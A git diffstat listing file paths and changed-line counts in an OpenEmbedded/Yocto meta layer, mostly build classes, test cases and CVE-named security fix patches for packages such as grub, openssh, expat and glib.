-rw-r--r--meta/classes/linuxloader.bbclass6
-rw-r--r--meta/classes/metadata_scm.bbclass8
-rw-r--r--meta/classes/mirrors.bbclass5
-rw-r--r--meta/classes/multilib.bbclass2
-rw-r--r--meta/classes/nativesdk.bbclass2
-rw-r--r--meta/classes/npm.bbclass8
-rw-r--r--meta/classes/package.bbclass108
-rw-r--r--meta/classes/package_deb.bbclass4
-rw-r--r--meta/classes/package_ipk.bbclass3
-rw-r--r--meta/classes/package_pkgdata.bbclass2
-rw-r--r--meta/classes/package_rpm.bbclass9
-rw-r--r--meta/classes/patch.bbclass7
-rw-r--r--meta/classes/populate_sdk_base.bbclass18
-rw-r--r--meta/classes/populate_sdk_ext.bbclass12
-rw-r--r--meta/classes/pypi.bbclass2
-rw-r--r--meta/classes/python3native.bbclass2
-rw-r--r--meta/classes/python3targetconfig.bbclass29
-rw-r--r--meta/classes/qemuboot.bbclass3
-rw-r--r--meta/classes/report-error.bbclass2
-rw-r--r--meta/classes/reproducible_build.bbclass90
-rw-r--r--meta/classes/rm_work.bbclass15
-rw-r--r--meta/classes/rootfs-postcommands.bbclass22
-rw-r--r--meta/classes/rootfs_deb.bbclass2
-rw-r--r--meta/classes/rootfs_ipk.bbclass2
-rw-r--r--meta/classes/rootfs_rpm.bbclass2
-rw-r--r--meta/classes/rootfsdebugfiles.bbclass2
-rw-r--r--meta/classes/sanity.bbclass61
-rw-r--r--meta/classes/scons.bbclass3
-rw-r--r--meta/classes/sstate.bbclass98
-rw-r--r--meta/classes/staging.bbclass14
-rw-r--r--meta/classes/systemd.bbclass3
-rw-r--r--meta/classes/testimage.bbclass40
-rw-r--r--meta/classes/toolchain-scripts.bbclass4
-rw-r--r--meta/classes/uboot-extlinux-config.bbclass1
-rw-r--r--meta/classes/uninative.bbclass8
-rw-r--r--meta/classes/useradd-staticids.bbclass2
-rw-r--r--meta/classes/useradd.bbclass4
-rw-r--r--meta/classes/utils.bbclass2
-rw-r--r--meta/classes/waf.bbclass18
-rw-r--r--meta/conf/abi_version.conf4
-rw-r--r--meta/conf/bitbake.conf29
-rw-r--r--meta/conf/distro/include/cve-extra-exclusions.inc75
-rw-r--r--meta/conf/distro/include/default-distrovars.inc4
-rw-r--r--meta/conf/distro/include/maintainers.inc51
-rw-r--r--meta/conf/distro/include/ptest-packagelists.inc2
-rw-r--r--meta/conf/distro/include/yocto-uninative.inc11
-rw-r--r--meta/conf/layer.conf4
-rw-r--r--meta/conf/licenses.conf15
-rw-r--r--meta/conf/machine/include/qemu.inc2
-rw-r--r--meta/conf/multilib.conf2
-rw-r--r--meta/files/common-licenses/Spencer-9412
-rw-r--r--meta/files/common-licenses/Unlicense24
-rw-r--r--meta/files/fs-perms-persistent-log.txt2
-rw-r--r--meta/files/fs-perms.txt2
-rw-r--r--meta/files/spdx-licenses.json5937
-rw-r--r--meta/files/toolchain-shar-extract.sh15
-rw-r--r--meta/files/toolchain-shar-relocate.sh13
-rw-r--r--meta/lib/bblayers/create.py2
-rw-r--r--meta/lib/buildstats.py4
-rw-r--r--meta/lib/oe/copy_buildsystem.py6
-rw-r--r--meta/lib/oe/cve_check.py212
-rw-r--r--meta/lib/oe/gpg_sign.py2
-rw-r--r--meta/lib/oe/license.py6
-rw-r--r--meta/lib/oe/package_manager.py15
-rw-r--r--meta/lib/oe/packagedata.py11
-rw-r--r--meta/lib/oe/patch.py8
-rw-r--r--meta/lib/oe/path.py21
-rw-r--r--meta/lib/oe/prservice.py4
-rw-r--r--meta/lib/oe/qa.py1
-rw-r--r--meta/lib/oe/recipeutils.py2
-rw-r--r--meta/lib/oe/reproducible.py15
-rw-r--r--meta/lib/oe/rootfs.py8
-rw-r--r--meta/lib/oe/sbom.py84
-rw-r--r--meta/lib/oe/spdx.py357
-rw-r--r--meta/lib/oe/sstatesig.py15
-rw-r--r--meta/lib/oe/terminal.py20
-rw-r--r--meta/lib/oe/utils.py5
-rw-r--r--meta/lib/oeqa/core/case.py9
-rw-r--r--meta/lib/oeqa/core/decorator/oetimeout.py5
-rw-r--r--meta/lib/oeqa/core/target/ssh.py4
-rw-r--r--meta/lib/oeqa/core/tests/cases/timeout.py13
-rwxr-xr-xmeta/lib/oeqa/core/tests/test_decorators.py6
-rw-r--r--meta/lib/oeqa/manual/eclipse-plugin.json6
-rw-r--r--meta/lib/oeqa/manual/oe-core.json2
-rw-r--r--meta/lib/oeqa/manual/toaster-managed-mode.json2
-rw-r--r--meta/lib/oeqa/runtime/cases/date.py13
-rw-r--r--meta/lib/oeqa/runtime/cases/df.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py36
-rw-r--r--meta/lib/oeqa/runtime/cases/ksample.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/ltp.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/pam.py3
-rw-r--r--meta/lib/oeqa/runtime/cases/parselogs.py21
-rw-r--r--meta/lib/oeqa/runtime/cases/ping.py20
-rw-r--r--meta/lib/oeqa/runtime/cases/ptest.py1
-rw-r--r--meta/lib/oeqa/runtime/cases/rpm.py32
-rw-r--r--meta/lib/oeqa/runtime/cases/rtc.py40
-rw-r--r--meta/lib/oeqa/runtime/cases/runlevel.py22
-rw-r--r--meta/lib/oeqa/runtime/cases/scp.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/suspend.py33
-rw-r--r--meta/lib/oeqa/runtime/cases/terminal.py21
-rw-r--r--meta/lib/oeqa/runtime/cases/usb_hid.py22
-rw-r--r--meta/lib/oeqa/runtime/context.py33
-rw-r--r--meta/lib/oeqa/sdk/cases/buildepoxy.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/archiver.py16
-rw-r--r--meta/lib/oeqa/selftest/cases/bblayers.py5
-rw-r--r--meta/lib/oeqa/selftest/cases/bbtests.py13
-rw-r--r--meta/lib/oeqa/selftest/cases/buildoptions.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/cve_check.py220
-rw-r--r--meta/lib/oeqa/selftest/cases/devtool.py60
-rw-r--r--meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt1
-rw-r--r--meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt1
-rw-r--r--meta/lib/oeqa/selftest/cases/distrodata.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/glibc.py8
-rw-r--r--meta/lib/oeqa/selftest/cases/gotoolchain.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/imagefeatures.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/oelib/elf.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/oelib/utils.py3
-rw-r--r--meta/lib/oeqa/selftest/cases/oescripts.py3
-rw-r--r--meta/lib/oeqa/selftest/cases/pkgdata.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/prservice.py10
-rw-r--r--meta/lib/oeqa/selftest/cases/pseudo.py27
-rw-r--r--meta/lib/oeqa/selftest/cases/recipetool.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/reproducible.py128
-rw-r--r--meta/lib/oeqa/selftest/cases/runcmd.py4
-rw-r--r--meta/lib/oeqa/selftest/cases/runqemu.py9
-rw-r--r--meta/lib/oeqa/selftest/cases/runtime_test.py44
-rw-r--r--meta/lib/oeqa/selftest/cases/sstatetests.py14
-rw-r--r--meta/lib/oeqa/selftest/cases/tinfoil.py30
-rw-r--r--meta/lib/oeqa/selftest/cases/wic.py124
-rw-r--r--meta/lib/oeqa/selftest/context.py17
-rw-r--r--meta/lib/oeqa/utils/buildproject.py3
-rw-r--r--meta/lib/oeqa/utils/commands.py10
-rw-r--r--meta/lib/oeqa/utils/metadata.py6
-rw-r--r--meta/lib/oeqa/utils/nfs.py4
-rw-r--r--meta/lib/oeqa/utils/qemurunner.py41
-rw-r--r--meta/lib/oeqa/utils/targetbuild.py4
-rw-r--r--meta/recipes-bsp/efibootmgr/efibootmgr_17.bb2
-rw-r--r--meta/recipes-bsp/efivar/efivar/determinism.patch18
-rw-r--r--meta/recipes-bsp/efivar/efivar_37.bb3
-rw-r--r--meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb1
-rw-r--r--meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch235
-rw-r--r--meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch30
-rw-r--r--meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch65
-rw-r--r--meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch59
-rw-r--r--meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch53
-rw-r--r--meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch52
-rw-r--r--meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch53
-rw-r--r--meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch55
-rw-r--r--meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch41
-rw-r--r--meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch34
-rw-r--r--meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch128
-rw-r--r--meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch28
-rw-r--r--meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch42
-rw-r--r--meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch121
-rw-r--r--meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch56
-rw-r--r--meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch35
-rw-r--r--meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch82
-rw-r--r--meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch36
-rw-r--r--meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch52
-rw-r--r--meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch56
-rw-r--r--meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch94
-rw-r--r--meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch78
-rw-r--r--meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch104
-rw-r--r--meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch38
-rw-r--r--meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch34
-rw-r--r--meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch47
-rw-r--r--meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch38
-rw-r--r--meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch77
-rw-r--r--meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch42
-rw-r--r--meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch41
-rw-r--r--meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch46
-rw-r--r--meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch28
-rw-r--r--meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch37
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch2
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372.patch76
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch130
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch431
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch57
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch52
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch158
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-25632.patch90
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-25647.patch119
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27749.patch609
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779.patch70
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch105
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch37
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch35
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch62
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch61
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch65
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-20225.patch58
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-20233.patch50
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3695.patch178
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3696.patch46
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3697.patch82
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3981.patch32
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-2601.patch87
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28733.patch60
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28734.patch67
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28735.patch271
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28736.patch275
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-3775.patch97
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2023-4692.patch97
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2023-4693.patch62
-rw-r--r--meta/recipes-bsp/grub/files/determinism.patch56
-rw-r--r--meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch117
-rw-r--r--meta/recipes-bsp/grub/files/no-insmod-on-sb.patch107
-rw-r--r--meta/recipes-bsp/grub/grub2.inc88
-rw-r--r--meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch36
-rw-r--r--meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb1
-rw-r--r--meta/recipes-bsp/opensbi/opensbi_0.6.bb3
-rw-r--r--meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb5
-rw-r--r--meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch98
-rw-r--r--meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch52
-rw-r--r--meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch114
-rw-r--r--meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb2
-rw-r--r--meta/recipes-bsp/u-boot/u-boot-common.inc7
-rw-r--r--meta/recipes-bsp/u-boot/u-boot-tools.inc15
-rw-r--r--meta/recipes-bsp/v86d/v86d_0.1.10.bb1
-rw-r--r--meta/recipes-connectivity/avahi/avahi.inc10
-rw-r--r--meta/recipes-connectivity/avahi/avahi_0.7.bb3
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch42
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch60
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch48
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch65
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch57
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch53
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch73
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch52
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch45
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch109
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch67
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch31
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch33
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch166
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch175
-rw-r--r--meta/recipes-connectivity/bind/bind_9.11.37.bb (renamed from meta/recipes-connectivity/bind/bind_9.11.22.bb)10
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5.inc8
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch109
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch34
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch95
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch66
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch39
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch126
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch54
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5_5.55.bb10
-rw-r--r--meta/recipes-connectivity/connman/connman-gnome_0.7.bb2
-rw-r--r--meta/recipes-connectivity/connman/connman.inc2
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch62
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch231
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch33
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch72
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch121
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch50
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch37
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch266
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch54
-rw-r--r--meta/recipes-connectivity/connman/connman_1.37.bb9
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch66
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch120
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch40
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb3
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch283
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch254
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch67
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch54
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb4
-rw-r--r--meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb3
-rw-r--r--meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb8
-rw-r--r--meta/recipes-connectivity/neard/neard_0.16.bb13
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch97
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch20
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch52
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch189
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch581
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch171
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch34
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch194
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch73
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch125
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch315
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch38
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch39
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch307
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch120
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch468
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch95
-rw-r--r--meta/recipes-connectivity/openssh/openssh/sshd.socket1
-rw-r--r--meta/recipes-connectivity/openssh/openssh/sshd@.service2
-rw-r--r--meta/recipes-connectivity/openssh/openssh_8.2p1.bb58
-rw-r--r--meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch38
-rw-r--r--meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch37
-rw-r--r--meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch122
-rw-r--r--meta/recipes-connectivity/openssl/openssl/reproducibility.patch22
-rw-r--r--meta/recipes-connectivity/openssl/openssl_1.1.1w.bb (renamed from meta/recipes-connectivity/openssl/openssl_1.1.1g.bb)9
-rw-r--r--meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb1
-rw-r--r--meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch50
-rw-r--r--meta/recipes-connectivity/ppp/ppp_2.4.7.bb5
-rw-r--r--meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb2
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch45
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch58
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch123
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch609
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb5
-rw-r--r--meta/recipes-core/base-files/base-files/hosts2
-rw-r--r--meta/recipes-core/base-passwd/base-passwd_3.5.29.bb1
-rw-r--r--meta/recipes-core/busybox/busybox.inc29
-rw-r--r--meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch51
-rw-r--r--meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch38
-rw-r--r--meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch81
-rw-r--r--meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch64
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2021-42374.patch53
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2021-42376.patch138
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2022-48174.patch82
-rw-r--r--meta/recipes-core/busybox/busybox_1.31.1.bb10
-rw-r--r--meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch215
-rw-r--r--meta/recipes-core/coreutils/coreutils_8.31.bb8
-rw-r--r--meta/recipes-core/dbus-wait/dbus-wait_git.bb3
-rw-r--r--meta/recipes-core/dbus/dbus-test_1.12.24.bb (renamed from meta/recipes-core/dbus/dbus-test_1.12.16.bb)42
-rw-r--r--meta/recipes-core/dbus/dbus.inc36
-rw-r--r--meta/recipes-core/dbus/dbus/CVE-2020-12049.patch78
-rw-r--r--meta/recipes-core/dbus/dbus/CVE-2023-34969.patch96
-rw-r--r--meta/recipes-core/dbus/dbus_1.12.24.bb (renamed from meta/recipes-core/dbus/dbus_1.12.16.bb)40
-rw-r--r--meta/recipes-core/dropbear/dropbear.inc11
-rw-r--r--meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch29
-rw-r--r--meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch145
-rw-r--r--meta/recipes-core/ell/ell_0.33.bb1
-rw-r--r--meta/recipes-core/expat/expat/CVE-2013-0340.patch1758
-rw-r--r--meta/recipes-core/expat/expat/CVE-2021-45960.patch65
-rw-r--r--meta/recipes-core/expat/expat/CVE-2021-46143.patch49
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-22822-27.patch257
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-23852.patch33
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-23990.patch49
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25235.patch283
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25236.patch129
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch131
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25313.patch230
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25314.patch32
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25315.patch145
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-40674.patch53
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-43680.patch33
-rw-r--r--meta/recipes-core/expat/expat/libtool-tag.patch41
-rw-r--r--meta/recipes-core/expat/expat_2.2.9.bb29
-rw-r--r--meta/recipes-core/fts/fts_1.2.7.bb3
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch41
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch129
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch170
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch249
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch131
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch298
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch54
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch101
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch76
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch101
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch100
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch59
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch63
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch36
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch38
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch38
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch100
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch43
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch232
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch27
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch42
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch57
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch265
